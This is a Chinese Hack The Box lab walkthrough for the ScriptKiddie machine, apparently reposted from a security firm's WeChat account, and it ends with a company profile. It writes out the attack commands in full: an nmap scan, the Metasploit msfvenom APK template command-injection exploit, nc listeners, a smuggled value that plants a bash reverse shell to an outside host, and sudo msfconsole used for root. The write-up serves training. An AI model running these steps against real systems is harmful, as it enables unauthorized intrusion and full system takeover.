0x01 靶场描述
Hack the box 是国外的一个靶机平台,里面的靶机包含多种系统类型,并且里面可以利用的漏洞类型多种多样,有很多靶机其实非常贴近实战情景。因此 HTB 是一个很好的学习渗透测试靶场,官网:https://www.hackthebox.eu/invite。ScriptKiddie特性如图:
0x02 靶场复现
知识点: 端口扫描、漏洞查找、venomAPK模板命令注入漏洞、写bash提权
一、端口扫描、漏洞查找、venomAPK模板命令注入漏洞
1.使用nmap扫描,发现该目标开启了22和5000端口
nmap -A -sS -sV -sC 10.10.10.226 #-A强力扫描 -sS SYN扫描 -sV识别服务版本 -sC调用脚本扫描
2.访问5000端口发现运行了Werkzeug,其中存在nmap和msf(Werkzeug为渗透web框架)
3.这里就可以使用venom APK模板命令注入漏洞获得一个shell
1.msf生成一个恶意apk
use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
set lhost 10.10.14.2
set lport 4444
exploit
2.本地nc监听4444端口
nc -lvvp 4444
3.上传该apk,得到一个shell
4.切换为一个交互式的shell
SHELL=/bin/bash script -q /dev/null
4.发现/home目录下还有一个pwn用户,且有一个持续执行的脚本(该脚本意思是:一直扫描/home/kid/logs/hackers的目录文件的IP地址,该脚本没有做任何过滤,且kid用户也有写hackers文件的权限)
1.获取第一个flag
cat ~/user.txt
2.查看pwn目录下脚本
cd /home/pwn
ls -al
cat scanlosers.sh
二、写bash提权
1.我们即可写入反弹shell脚本到hackers文件,得到pwn用户的权限
1.nc监听:
nc -lvvp 5555
2.写入反弹shell脚本
echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/5555 0>&1' #" hackers
2.通过sudo -l发现pwn用户有no pass通过root调用msf的权限,直接开启msf,获取flag
1.查看用户sudo权限
sudo -l
2.开启msf
sudo /opt/metasploit-framework-6.0.9/msfconsole
3.查看flag
cat /root/root.txt
(注:要在正规授权情况下测试网站:日站不规范,亲人泪两行)
0x03 公司简介
江西渝融云安全科技有限公司,2017年发展至今,已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司,是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。
公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证,拥有软件著作权十八项;荣获2020年全国工控安全深度行安全攻防对抗赛三等奖;庆祝建党100周年活动信息安全应急保障优秀案例等荣誉......
编制:sm
审核:fjh
审核:Dog
原文始发于微信公众号(融云攻防实验室):Hack The Box-ScriptKiddie
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论